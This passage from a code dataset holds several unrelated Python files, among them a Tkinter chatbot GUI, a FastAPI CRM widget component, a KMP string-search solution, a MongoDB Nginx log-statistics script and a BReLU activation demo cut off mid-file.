self.get_connected(line.tail)\n self.connect_lifelines(line, send, received)\n\n lifetime = self.element.lifetime\n # if connected to head, then make lifetime invisible\n if port is lifetime.port:\n lifetime.min_length = lifetime.MIN_LENGTH_VISIBLE\n else:\n lifetime.visible = False\n lifetime.connectable = False\n\n\n def disconnect(self, handle):\n super(MessageLifelineConnect, self).disconnect(handle)\n\n line = self.line\n send = self.get_connected(line.head)\n received = self.get_connected(line.tail)\n lifeline = self.element\n lifetime = lifeline.lifetime\n\n # if a message is delete message, then disconnection causes\n # lifeline to be no longer destroyed (note that there can be\n # only one delete message connected to lifeline)\n if received and line.subject.messageSort == 'deleteMessage':\n received.is_destroyed = False\n received.request_update()\n\n self.disconnect_lifelines(line)\n\n if len(list(self.canvas.get_connections(connected=lifeline))) == 1:\n # after disconnection count of connected items will be\n # zero, so allow connections to lifeline's lifetime\n lifetime.connectable = True\n lifetime.min_length = lifetime.MIN_LENGTH\n \n\n\ncomponent.provideAdapter(MessageLifelineConnect)\n\n","repo_name":"gitter-badger/dabbler","sub_path":"gaphor/adapters/interactions/messageconnect.py","file_name":"messageconnect.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4255230578","text":"import nltk\nfrom nltk.stem import WordNetLemmatizer\nlemmatizer = WordNetLemmatizer()\nimport pickle\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nmodel = load_model('chatbot_model.h5')\nimport json\nimport random\nimport string\nimport tkinter\nfrom tkinter import PhotoImage\nfrom tkinter import *\nimport time\nimport threading\nimport tkinter.messagebox\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\nimport tempfile, base64, zlib\nimport 
logging\nimport datetime\nimport os\n\n\nintents = json.loads(open('intents.json').read())\nwords = pickle.load(open('words.pkl','rb'))\nclasses = pickle.load(open('classes.pkl','rb'))\n\ndef bag_of_words(s, words):\n bag = [0 for _ in range(len(words))]\n\n s_words = nltk.word_tokenize(s)\n s_words = [stemmer.stem(word.lower()) for word in s_words]\n\n for se in s_words:\n for i, w in enumerate(words):\n if w == se:\n bag[i] = 1\n \n return np.array(bag)\n\ndef clean_up_sentence(sentence):\n # tokenize the pattern - split words into array\n sentence_words = nltk.word_tokenize(sentence)\n # stem each word - create short form for word\n sentence_words = [lemmatizer.lemmatize(word.lower()) for word in sentence_words]\n return sentence_words\n# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\ndef bow(sentence, words, show_details=True):\n # tokenize the pattern\n sentence_words = clean_up_sentence(sentence)\n # bag of words - matrix of N words, vocabulary matrix\n bag = [0]*len(words) \n for s in sentence_words:\n for i,w in enumerate(words):\n if w == s: \n # assign 1 if current word is in the vocabulary position\n bag[i] = 1\n if show_details:\n print (\"found in bag: %s\" % w)\n return(np.array(bag))\n\ndef getResponse(sentence, model, intents_json): \n threshold=0.6\n results = model.predict(np.array([bag_of_words(sentence, words)]))[0]\n # sort by strength of probability\n results_index = np.argmax(results)\n tag = classes[results_index]\n # If probability below threshold ask users to try another question\n if results[results_index] > threshold:\n for tg in intents_json[\"intents\"]:\n if tg['tag'] == tag:\n responses = tg['responses']\n result= random.choice(responses)\n return result\n else:\n result2= string.capwords(\"I didn't quite get that, try again or ask another question.\")\n logger.info('Unsupported question: %s' % sentence)\n return result2\n\ndef chatbot_response(text):\n res = getResponse(text, model, intents)\n return res\ndef send():\n msg = EntryBox.get(\"1.0\",'end-1c').strip()\n EntryBox.delete(\"0.0\",END)\n if msg != '':\n ChatLog.config(state=NORMAL)\n ChatLog.insert(END, \"You: \" + msg + '\\n\\n')\n ChatLog.config(foreground=\"#442265\", font=(\"Verdana\", 12 ))\n res = chatbot_response(msg)\n ChatLog.insert(END, \"Bot: \" + res + '\\n\\n')\n ChatLog.config(state=DISABLED)\n ChatLog.yview(END)\n\nsaved_username = [\"You\"]\nwindow_size=\"600x300\"\n\nclass ChatInterface(Frame):\n\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n\n # sets default bg for top level windows\n self.tl_bg = \"#EEEEEE\"\n self.tl_bg2 = \"#EEEEEE\"\n self.tl_fg = \"#000000\"\n self.font = \"Verdana 10\"\n\n menu = Menu(self.master)\n self.master.config(menu=menu, bd=5)\n\n# Menu bar\n\n # File\n file = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"File\", menu=file)\n file.add_command(label=\"Clear Chat\", command=self.clear_chat)\n file.add_command(label=\"Exit\",command=self.chatexit)\n \n # Options\n options = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Options\", menu=options) \n\n \n # font\n font = Menu(options, tearoff=0)\n options.add_cascade(label=\"Font\", menu=font)\n font.add_command(label=\"Default\",command=self.font_change_default)\n font.add_command(label=\"Times\",command=self.font_change_times)\n font.add_command(label=\"System\",command=self.font_change_system)\n font.add_command(label=\"Helvetica\",command=self.font_change_helvetica)\n 
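# What bag_of_words/bow above compute, reduced to a toy vocabulary
# (assumed example; tokenization and stemming omitted):
import numpy as np

vocab = ["hello", "price", "refund", "bye"]

def to_bag(tokens, vocab):
    # 1 where a vocabulary word occurs in the sentence, else 0
    bag = np.zeros(len(vocab), dtype=int)
    for i, w in enumerate(vocab):
        if w in tokens:
            bag[i] = 1
    return bag

print(to_bag(["hello", "refund"], vocab))  # [1 0 1 0]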
font.add_command(label=\"Fixedsys\",command=self.font_change_fixedsys)\n\n # color theme\n color_theme = Menu(options, tearoff=0)\n options.add_cascade(label=\"Color Theme\", menu=color_theme)\n color_theme.add_command(label=\"Default\",command=self.color_theme_default) \n color_theme.add_command(label=\"Grey\",command=self.color_theme_grey) \n color_theme.add_command(label=\"Blue\",command=self.color_theme_dark_blue) \n color_theme.add_command(label=\"Torque\",command=self.color_theme_turquoise)\n\n\n \n help_option = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Help\", menu=help_option)\n help_option.add_command(label=\"About Squirro Bot\", command=self.msg)\n \n\n self.text_frame = Frame(self.master, bd=6)\n self.text_frame.pack(expand=True, fill=BOTH)\n\n # scrollbar for text box\n self.text_box_scrollbar = Scrollbar(self.text_frame, bd=0)\n self.text_box_scrollbar.pack(fill=Y, side=RIGHT)\n\n # contains messages\n self.text_box = Text(self.text_frame, yscrollcommand=self.text_box_scrollbar.set, state=DISABLED,\n bd=2, padx=6, pady=6, spacing3=8, wrap=WORD, bg=None, font=\"Verdana 10\", relief=GROOVE,\n width=10, height=1)\n self.text_box.pack(expand=True, fill=BOTH)\n self.text_box_scrollbar.config(command=self.text_box.yview)\n\n # frame containing user entry field\n self.entry_frame = Frame(self.master, bd=1)\n self.entry_frame.pack(side=LEFT, fill=BOTH, expand=True)\n\n # entry field\n self.entry_field = Entry(self.entry_frame, bd=2, justify=LEFT)\n self.entry_field.pack(fill=X, padx=6, pady=6, ipady=6)\n \n\n # frame containing send button and emoji button\n self.send_button_frame = Frame(self.master, bd=0)\n self.send_button_frame.pack(fill=BOTH)\n\n # send button\n \n root.geometry(\"960x600\") \n snd_button = PhotoImage(file=\"paper-plane.png\")\n root.title(\"Squirro Bot\") \n root.iconbitmap('favicon.ico')\n\n self.send_button = Button(self.send_button_frame, image=snd_button, borderwidth=0,\n command=lambda: self.send_message_insert(None))\n self.send_button.pack(side=RIGHT, ipady=8)\n self.master.bind(\"\", self.send_message_insert)\n \n self.last_sent_label(date=\"No messages sent.\")\n root.mainloop()\n \n def last_sent_label(self, date):\n\n try:\n self.sent_label.destroy()\n except AttributeError:\n pass\n\n self.sent_label = Label(self.entry_frame, font=\"Verdana 7\", text=date, bg=self.tl_bg2, fg=self.tl_fg)\n self.sent_label.pack(side=LEFT, fill=X, padx=3)\n\n def clear_chat(self):\n self.text_box.config(state=NORMAL)\n self.last_sent_label(date=\"No messages sent.\")\n self.text_box.delete(1.0, END)\n self.text_box.delete(1.0, END)\n self.text_box.config(state=DISABLED)\n\n def chatexit(self):\n exit()\n \n def msg(self):\n tkinter.messagebox.showinfo(\"Squirro Bot v1.0\",'Squirro Bot is a chatbot for answering Squirro queries')\n \n\n def send_message_insert(self, message):\n user_input = self.entry_field.get()\n pr1 = \"Me : \" + user_input + \"\\n\"\n self.text_box.configure(state=NORMAL)\n self.text_box.insert(END, pr1)\n self.text_box.configure(state=DISABLED)\n self.text_box.see(END)\n msg = \"Squirro Bot : \"\n ob=chatbot_response(user_input)\n pr=msg + ob + \"\\n\"\n self.text_box.configure(state=NORMAL)\n self.text_box.insert(END, pr)\n self.text_box.configure(state=DISABLED)\n self.text_box.see(END)\n self.last_sent_label(str(time.strftime( \"Last message sent: \" + '%B %d, %Y' + ' at ' + '%I:%M %p')))\n self.entry_field.delete(0,END)\n time.sleep(0)\n\n \n def font_change_default(self):\n self.text_box.config(font=\"Verdana 10\")\n 
self.entry_field.config(font=\"Verdana 10\")\n self.font = \"Verdana 10\"\n\n def font_change_times(self):\n self.text_box.config(font=\"Times\")\n self.entry_field.config(font=\"Times\")\n self.font = \"Times\"\n\n def font_change_system(self):\n self.text_box.config(font=\"System\")\n self.entry_field.config(font=\"System\")\n self.font = \"System\"\n\n def font_change_helvetica(self):\n self.text_box.config(font=\"helvetica 10\")\n self.entry_field.config(font=\"helvetica 10\")\n self.font = \"helvetica 10\"\n\n def font_change_fixedsys(self):\n self.text_box.config(font=\"fixedsys\")\n self.entry_field.config(font=\"fixedsys\")\n self.font = \"fixedsys\"\n\n def color_theme_default(self):\n self.master.config(bg=\"#EEEEEE\")\n self.text_frame.config(bg=\"#EEEEEE\")\n self.entry_frame.config(bg=\"#EEEEEE\")\n self.text_box.config(bg=\"#FFFFFF\", fg=\"#000000\")\n self.entry_field.config(bg=\"#FFFFFF\", fg=\"#000000\", insertbackground=\"#000000\")\n self.send_button_frame.config(bg=\"#EEEEEE\")\n self.send_button.config(bg=\"#FFFFFF\", fg=\"#000000\", activebackground=\"#FFFFFF\", activeforeground=\"#000000\")\n self.sent_label.config(bg=\"#EEEEEE\", fg=\"#000000\")\n\n self.tl_bg = \"#FFFFFF\"\n self.tl_bg2 = \"#EEEEEE\"\n self.tl_fg = \"#000000\"\n\n # Dark\n def color_theme_dark(self):\n self.master.config(bg=\"#2a2b2d\")\n self.text_frame.config(bg=\"#2a2b2d\")\n self.text_box.config(bg=\"#212121\", fg=\"#FFFFFF\")\n self.entry_frame.config(bg=\"#2a2b2d\")\n self.entry_field.config(bg=\"#212121\", fg=\"#FFFFFF\", insertbackground=\"#FFFFFF\")\n self.send_button_frame.config(bg=\"#2a2b2d\")\n self.send_button.config(bg=\"#212121\", fg=\"#FFFFFF\", activebackground=\"#212121\", activeforeground=\"#FFFFFF\")\n self.sent_label.config(bg=\"#2a2b2d\", fg=\"#FFFFFF\")\n\n self.tl_bg = \"#212121\"\n self.tl_bg2 = \"#2a2b2d\"\n self.tl_fg = \"#FFFFFF\"\n\n # Grey\n def color_theme_grey(self):\n self.master.config(bg=\"#444444\")\n self.text_frame.config(bg=\"#444444\")\n self.text_box.config(bg=\"#4f4f4f\", fg=\"#ffffff\")\n self.entry_frame.config(bg=\"#444444\")\n self.entry_field.config(bg=\"#4f4f4f\", fg=\"#ffffff\", insertbackground=\"#ffffff\")\n self.send_button_frame.config(bg=\"#444444\")\n self.send_button.config(bg=\"#4f4f4f\", fg=\"#ffffff\", activebackground=\"#4f4f4f\", activeforeground=\"#ffffff\")\n self.sent_label.config(bg=\"#444444\", fg=\"#ffffff\")\n\n self.tl_bg = \"#4f4f4f\"\n self.tl_bg2 = \"#444444\"\n self.tl_fg = \"#ffffff\"\n\n\n def color_theme_turquoise(self):\n self.master.config(bg=\"#003333\")\n self.text_frame.config(bg=\"#003333\")\n self.text_box.config(bg=\"#669999\", fg=\"#FFFFFF\")\n self.entry_frame.config(bg=\"#003333\")\n self.entry_field.config(bg=\"#669999\", fg=\"#FFFFFF\", insertbackground=\"#FFFFFF\")\n self.send_button_frame.config(bg=\"#003333\")\n self.send_button.config(bg=\"#669999\", fg=\"#FFFFFF\", activebackground=\"#669999\", activeforeground=\"#FFFFFF\")\n self.sent_label.config(bg=\"#003333\", fg=\"#FFFFFF\")\n\n self.tl_bg = \"#669999\"\n self.tl_bg2 = \"#003333\"\n self.tl_fg = \"#FFFFFF\" \n\n # Blue\n def color_theme_dark_blue(self):\n self.master.config(bg=\"#263b54\")\n self.text_frame.config(bg=\"#263b54\")\n self.text_box.config(bg=\"#1c2e44\", fg=\"#FFFFFF\")\n self.entry_frame.config(bg=\"#263b54\")\n self.entry_field.config(bg=\"#1c2e44\", fg=\"#FFFFFF\", insertbackground=\"#FFFFFF\")\n self.send_button_frame.config(bg=\"#263b54\")\n self.send_button.config(bg=\"#1c2e44\", fg=\"#FFFFFF\", activebackground=\"#1c2e44\", 
activeforeground=\"#FFFFFF\")\n self.sent_label.config(bg=\"#263b54\", fg=\"#FFFFFF\")\n\n self.tl_bg = \"#1c2e44\"\n self.tl_bg2 = \"#263b54\"\n self.tl_fg = \"#FFFFFF\"\n\n \n \n\n # Torque\n def color_theme_turquoise(self):\n self.master.config(bg=\"#003333\")\n self.text_frame.config(bg=\"#003333\")\n self.text_box.config(bg=\"#669999\", fg=\"#FFFFFF\")\n self.entry_frame.config(bg=\"#003333\")\n self.entry_field.config(bg=\"#669999\", fg=\"#FFFFFF\", insertbackground=\"#FFFFFF\")\n self.send_button_frame.config(bg=\"#003333\")\n self.send_button.config(bg=\"#669999\", fg=\"#FFFFFF\", activebackground=\"#669999\", activeforeground=\"#FFFFFF\")\n self.sent_label.config(bg=\"#003333\", fg=\"#FFFFFF\")\n\n self.tl_bg = \"#669999\"\n self.tl_bg2 = \"#003333\"\n self.tl_fg = \"#FFFFFF\"\n\n \n\n # Default font and color theme\n def default_format(self):\n self.font_change_default()\n self.color_theme_default() \n \n \n# Create application logger\nlogger_name = 'app_logger'\nlogger_level = logging.DEBUG\nlogger = logging.getLogger(logger_name)\nlogger.setLevel(logger_level)\n\n# Create file handler\nlog_file_name = 'chatbot_logs.log'\nlog_folder_path = '//sd1filepw11/apps/W Drive New Structure/Regulatory Operations/Chief Operating Office/Innovation/SquirroBotLogs'\nlog_file_path = os.path.join(log_folder_path, log_file_name)\nfile_handler = logging.FileHandler(log_file_path)\nfile_handler.setLevel(logger_level)\n\n# Create console handler\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logger_level)\n\n# Format log messages\nlog_message_format = '[%(asctime)s] [%(levelname)s] [%(filename)s] [Line %(lineno)s] %(message)s'\nlog_message_date_format = '%Y-%m-%d %H:%M:%S'\nlog_formatter = logging.Formatter(log_message_format, log_message_date_format)\nfile_handler.setFormatter(log_formatter)\nconsole_handler.setFormatter(log_formatter)\n\n# Add the handlers to the logger\nlogger.addHandler(file_handler)\nlogger.addHandler(console_handler)\n\n \nroot=Tk()\n\n\na = ChatInterface(root)\nroot.geometry(window_size)\nroot.mainloop()\n\n\n","repo_name":"1tua/chatbot","sub_path":"Chatbot_GUI_03.py","file_name":"Chatbot_GUI_03.py","file_ext":"py","file_size_in_byte":14293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45512398115","text":"from typing import Optional\n\nfrom fastapi import FastAPI\nfrom glassio.dispatcher import IDispatcher\nfrom glassio.initializable_components import AbstractInitializableComponent\n\nfrom amocrm_asterisk_ng.domain import IsUserPhoneNumerQuery\n\nfrom ...core import IGetUsersEmailAddressesQuery\n\nfrom .functions import GetUsersEmailAddressesQuery\nfrom .functions import IsUserPhoneNumerQueryImpl\nfrom .WidgetView import WidgetView\nfrom .AsteriskWidgetConfig import AsteriskWidgetConfig\n\n\n__all__ = [\n \"AsteriskWidgetComponent\",\n]\n\n\nclass AsteriskWidgetComponent(AbstractInitializableComponent):\n\n __slots__ = (\n \"__config\",\n \"__app\",\n \"__dispatcher\",\n \"__widget_view\",\n )\n\n def __init__(\n self,\n config: AsteriskWidgetConfig,\n app: FastAPI,\n dispatcher: IDispatcher,\n widget_view: WidgetView,\n ) -> None:\n super().__init__()\n self.__config = config\n self.__app = app\n self.__dispatcher = dispatcher\n self.__widget_view = widget_view\n\n async def _initialize(self) -> None:\n\n self.__app.add_route(\n \"/amocrm/calls\",\n self.__widget_view.handle,\n methods=[\"GET\"]\n )\n\n self.__dispatcher.add_function(\n function_type=IGetUsersEmailAddressesQuery,\n 
function=GetUsersEmailAddressesQuery(\n                users=self.__config.users,\n            )\n        )\n        self.__dispatcher.add_function(\n            function_type=IsUserPhoneNumerQuery,\n            function=IsUserPhoneNumerQueryImpl(\n                users=self.__config.users,\n            )\n        )\n\n    async def _deinitialize(self, exception: Optional[Exception] = None) -> None:\n        self.__dispatcher.delete_function(IsUserPhoneNumerQuery)\n        self.__dispatcher.delete_function(IGetUsersEmailAddressesQuery)\n","repo_name":"FRANTSSS/amocrm_asterisk_ng","sub_path":"amocrm_asterisk_ng/crm/amocrm/widgets/asterisk_widget/AsteriskWidgetComponent.py","file_name":"AsteriskWidgetComponent.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"74241636844","text":"# https://leetcode.com/problems/implement-strstr/\n# Implement strStr().\n# Given two strings needle and haystack, return the index of the first occurrence of needle in haystack,\n# or -1 if needle is not part of haystack.\n# Clarification:\n# What should we return when needle is an empty string? This is a great question to ask during an interview.\n# For the purpose of this problem, we will return 0 when needle is an empty string.\n# This is consistent with C's strstr() and Java's indexOf().\nclass Solution:\n    # KMP (Knuth-Morris-Pratt) algorithm\n    @staticmethod\n    def prefix_func(s: str):\n        n = len(s)\n        pi = [0] * n\n        for i in range(1, n):\n            p = pi[i - 1]\n            while s[i] != s[p] and p > 0:\n                p = pi[p - 1]\n            if s[i] == s[p]:\n                p += 1\n            pi[i] = p\n        return pi\n\n    def str_str(self, haystack: str, needle: str) -> int:\n        if not needle:\n            return 0\n        ls = len(needle)\n        p = self.prefix_func(needle + '#' + haystack)\n        for i in range(len(p)):\n            if p[i] == ls:\n                return i - 2 * ls\n        return -1\n\n\ndef test0():\n    h = 'sdndashjkasdjhaggdggjskasjhd'\n    n = 'sdjha'\n    print(Solution().str_str(h, n), h.find(n))\n\n\nif __name__ == '__main__':\n    test0()\n","repo_name":"diwert-ai/Problems","sub_path":"Problems/Leetcode/Easy/28. implement strStr().py","file_name":"28. 
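# The str_str solution above scans needle + '#' + haystack and reports a match
# when a prefix-function value reaches len(needle); a standalone check of what
# the prefix function computes (pi[i] = length of the longest proper prefix of
# s[:i+1] that is also its suffix):
def prefix_func(s):
    pi = [0] * len(s)
    for i in range(1, len(s)):
        p = pi[i - 1]
        while p > 0 and s[i] != s[p]:
            p = pi[p - 1]
        if s[i] == s[p]:
            p += 1
        pi[i] = p
    return pi

print(prefix_func("ababca"))  # [0, 0, 1, 2, 0, 1]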
implement strStr().py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71290742764","text":"NUM, IMG_SIZE, FACE = 8, 720, False\n\nconfig = lambda: None\nconfig.expName = None\nconfig.checkpoint_dir = None\nconfig.train = lambda: None\nconfig.train.batch_size = 4\nconfig.train.lr = 0.001\nconfig.train.decay = 0.001\nconfig.train.epochs = 10\nconfig.latent_code_garms_sz = 1024\n\nconfig.PCA_=35\nconfig.garmentKeys = ['Pants', 'ShortPants', 'ShirtNoCoat', 'TShirtNoCoat', 'LongCoat']\nconfig.NVERTS = 27554","repo_name":"bharat-b7/MultiGarmentNetwork","sub_path":"config_ver1.py","file_name":"config_ver1.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"19"} +{"seq_id":"3635712898","text":"def myfun(a,b):\r\n if src=='avadi' and des=='ponamalle':\r\n print(\"the amount is 50\")\r\n elif src=='avadi' and des=='redhills':\r\n print(\"the amount is 80\")\r\n else:\r\n print(\"check the enter location\")\r\n\r\n\r\n\r\nsrc=raw_input(\"enter the src\")\r\ndes=raw_input(\"enter the des\")\r\nmyfun(src,des)\r\n","repo_name":"meera-mai/python-programs","sub_path":"uber bill.py","file_name":"uber bill.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"50478121973","text":"#!/usr/bin/env python3\n\"\"\"\nProvides some stats about Nginx logs stored in MongoDB\nDatabase: logs\nCollection: nginx\n\"\"\"\n\nfrom pymongo import MongoClient\n\ndef log_stats(mongo_collection):\n \"\"\"\n Provides statistics about Nginx logs stored in MongoDB.\n \"\"\"\n # Total logs count\n total_logs = mongo_collection.count_documents({})\n\n # Methods count\n methods = [\"GET\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\"]\n methods_counts = {method: mongo_collection.count_documents({\"method\": method}) for method in methods}\n\n # Status check count\n status_check = mongo_collection.count_documents({\"method\": \"GET\", \"path\": \"/status\"})\n\n # IPs top 10\n pipeline = [\n {\"$group\": {\"_id\": \"$ip\", \"count\": {\"$sum\": 1}}},\n {\"$sort\": {\"count\": -1}},\n {\"$limit\": 10}\n ]\n ip_counts = list(mongo_collection.aggregate(pipeline))\n\n print(f\"{total_logs} logs\")\n print(\"Methods:\")\n for method, count in methods_counts.items():\n print(f\"\\tmethod {method}: {count}\")\n print(f\"{status_check} status check\")\n print(\"IPs:\")\n for ip_count in ip_counts:\n print(f\"\\t{ip_count['_id']}: {ip_count['count']}\")\n\nif __name__ == \"__main__\":\n client = MongoClient('mongodb://127.0.0.1:27017')\n logs_db = client.logs\n nginx_collection = logs_db.nginx\n\n log_stats(nginx_collection)\n\n","repo_name":"chibwesamuel/alx-backend-storage","sub_path":"0x01-NoSQL/102-log_stats.py","file_name":"102-log_stats.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15669653950","text":"import numpy as np\nfrom PIL import ImageTk, Image\nimport matplotlib.pyplot as plt\n\nvariables = [\"FS_t1_dxy\", \"FS_t1_eta\", \"FS_t1_pt\", \"FS_t2_dz\",\n \"FS_t2_phi\", \"HTT_dR\", \"nCleanJetGT30\", \"FS_t1_dz\", \"FS_t1_phi\",\n \"FS_t2_dxy\", \"FS_t2_eta\", \"FS_t2_pt\", \"HTT_m_vis\"]\n\ncommon_name = \"FS_plots/2p1_best_QCD_correct_ratio_err_ditau_\"\n\nfor variable in variables:\n print(f\"setting up plots for {variable}\")\n set1 = 
np.array(Image.open(common_name + \"0j/\"+variable+\".png\"))\n set2 = np.array(Image.open(common_name + \"1j/\"+variable+\".png\"))\n set3 = np.array(Image.open(common_name + \"GTE2j/\"+variable+\".png\"))\n\n images = [set1, set2, set3]\n image_titles = [\"0j\", \"1j\", \"GTE2j\"]\n\n fig = plt.figure(figsize=(15,5))\n for i in range(0,len(images)):\n ax = fig.add_subplot(1, 3, i+1)\n ax.title.set_text(image_titles[i])\n plt.imshow(images[i])\n plt.axis('off')\n plt.tight_layout()\n filename = \"FS_plots/compare-jet-modes-\"+variable\n print(f\"saving as {filename}\")\n plt.savefig(filename+\".png\")\n\nprint(\"finished\")\n","repo_name":"brallmond/SimplePlot","sub_path":"compare_01GTE2J.py","file_name":"compare_01GTE2J.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25237986643","text":"import pandas as pd\n\ndf = pd.DataFrame({'A': range(1, 6),\n\n 'B': range(10, 0, -2),\n\n 'C': range(10, 5, -1)})\nten = 10\nft = df.query('B == @ten')\nprint(df)\n\nfor index, row in df.iterrows():\n print(df.iat[index, 2])\n\nprint(ft)\n","repo_name":"zeynepaki/lcoe-merger-compacter","sub_path":"lcoe.py","file_name":"lcoe.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16685995134","text":"import csv\nimport pymongo\nimport os.path\nimport collections\nimport tldextract\nimport itertools\nfrom urllib.parse import urlsplit\nfrom urllib.parse import urlparse\nfrom pymongo import MongoClient\nfrom datetime import datetime\nimport timeit\nimport unicodedata\nimport gc\n\n\nPATH_WEB_LOG_FILE = '/media/moojokeubuntu/AA6259046258D6A3/AnotherDrive/Project/weblog/data/weblog-20180312_2/12/%s'\nPATH_WEB_LOG_FILE_2 = '/media/moojokeubuntu/AA6259046258D6A3/AnotherDrive/Project/weblog/data/weblog-20180319_2/19/%s'\nPATH_SAVE_LOG = '/home/moojokeubuntu/KU/4_2/RealProject/webpattern/Detection/Input'\nPATH_SAVE_LOG2 = '/home/moojokeubuntu/KU/4_2/RealProject/webpattern/Detection/Input/%s'\n\ndef readfile():\n\n list_folder_name = [\"00%s\",\n \"01%s\",\n \"02%s\",\n \"03%s\",\n \"04%s\",\n \"05%s\",\n \"06%s\",\n \"07%s\",\n \"08%s\",\n \"09%s\",\n \"10%s\",\n \"11%s\",\n \"12%s\",\n \"13%s\",\n \"14%s\",\n \"15%s\",\n \"16%s\",\n \"17%s\",\n \"18%s\",\n \"19%s\",\n \"20%s\",\n \"21%s\",\n \"22%s\",\n \"23%s\"]\n \n\n\n #list_folder_name = [\"13%\"s\"%s\",\"14%s\",\"15%s\"]\n #list_folder_name = [\"20%s\",\"21%s\",\"22%s\"]\n list_file_name =[\"/web-20180312%s\"]\n\n list_minute_name = [\"00%s\",\n \"01%s\",\n \"02%s\",\n \"03%s\",\n \"04%s\",\n \"05%s\",\n \"06%s\",\n \"07%s\",\n \"08%s\",\n \"09%s\",\n \"10%s\",\n \"11%s\",\n \"12%s\",\n \"13%s\",\n \"14%s\",\n \"15%s\",\n \"16%s\",\n \"17%s\",\n \"18%s\",\n \"19%s\",\n \"20%s\",\n \"21%s\",\n \"22%s\",\n \"23%s\",\n \"24%s\",\n \"25%s\",\n \"26%s\",\n \"27%s\",\n \"28%s\",\n \"29%s\",\n \"30%s\",\n \"31%s\",\n \"32%s\",\n \"33%s\",\n \"34%s\",\n \"35%s\",\n \"36%s\",\n \"37%s\",\n \"38%s\",\n \"39%s\",\n \"40%s\",\n \"41%s\",\n \"42%s\",\n \"43%s\",\n \"44%s\",\n \"45%s\",\n \"46%s\",\n \"47%s\",\n \"48%s\",\n \"49%s\",\n \"50%s\",\n \"51%s\",\n \"52%s\",\n \"53%s\",\n \"54%s\",\n \"55%s\",\n \"56%s\",\n \"57%s\",\n \"58%s\",\n \"59%s\"]\n \n list_char = []\n count = 0\n list_sub_name = [\".0.txt\",\".1.txt\",\".2.txt\",\".3.txt\",\".4.txt\",\".5.txt\"]\n for folder in list_folder_name :\n for file_name in list_file_name :\n for minute in 
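# df.query('B == @ten') in the pandas record above resolves @ten from the
# enclosing Python scope and is equivalent to a plain boolean mask:
import pandas as pd

df = pd.DataFrame({"A": range(1, 6), "B": range(10, 0, -2)})
ten = 10
print(df.query("B == @ten"))
print(df[df["B"] == ten])  # identical selection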
list_minute_name :\n for sub in list_sub_name :\n with open (PATH_WEB_LOG_FILE%(folder%(file_name%(folder%(minute%(sub)))))) as file: \n for line in file.readlines():\n #print(line)\n line_split = line.split(\" \")\n #print(len(line_split))\n if len(line_split) >= 17 :\n if line_split[15] == 'GET':\n if line_split[4] != \"-\" :\n print(line_split[17])\n for j in line_split[17] :\n if j not in list_char:\n print(j)\n count += 1\n list_char.append(j)\n for folder in list_folder_name :\n for file_name in list_file_name :\n for minute in list_minute_name :\n for sub in list_sub_name :\n with open (PATH_WEB_LOG_FILE_2%(folder%(file_name%(folder%(minute%(sub)))))) as file: \n for line in file.readlines():\n #print(line)\n line_split = line.split(\" \")\n #print(len(line_split))\n if len(line_split) >= 17 :\n if line_split[15] == 'GET':\n if line_split[4] != \"-\" :\n print(line_split[17])\n for j in line_split[17] :\n if j not in list_char:\n print(j)\n count += 1\n list_char.append(j)\n print(count)\n Write(list_char)\n \n\ndef Write(list_char):\n compath = os.path.join(PATH_SAVE_LOG, 'unique_all.txt')\n with open(compath,'a') as f:\n for key in list_char:\n f.writelines(key+'\\n') \n\n\nif __name__ == '__main__':\n start = timeit.default_timer()\n readfile()\n #oopen()\n #test()\n stop = timeit.default_timer()\n print(stop - start)","repo_name":"MooSithichai/Analysis_of_Unusual_Internet_Usage","sub_path":"URL/Mahala/find_unique.py","file_name":"find_unique.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23436030961","text":"'''\nScript for demonstration of the BReLU activation function.\n'''\n# import utilities\nimport sys\nsys.path.insert(0, '../')\nimport argparse\n\n# import pytorch\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\n\n# import BReLU from Echo\nfrom echoAI.Activation.Torch.brelu import BReLU\n\nclass CNN(nn.Module):\n '''\n Simple CNN to demonstrate BReLU activation.\n '''\n def __init__(self):\n super(CNN, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 16, kernel_size=5, padding=2),\n nn.BatchNorm2d(16))\n\n self.brelu1 = BReLU.apply\n self.pool1 = nn.MaxPool2d(2)\n\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 32, kernel_size=5, padding=2),\n nn.BatchNorm2d(32))\n\n self.brelu2 = BReLU.apply\n self.pool2 = nn.MaxPool2d(2)\n\n self.fc = nn.Linear(7*7*32, 10)\n\n def forward(self, x):\n x = x.reshape(-1, 1, 28, 28)\n\n x = self.layer1(x)\n x = self.brelu1(x)\n x = self.pool1(x)\n\n x = self.layer2(x)\n x = self.brelu2(x)\n x = 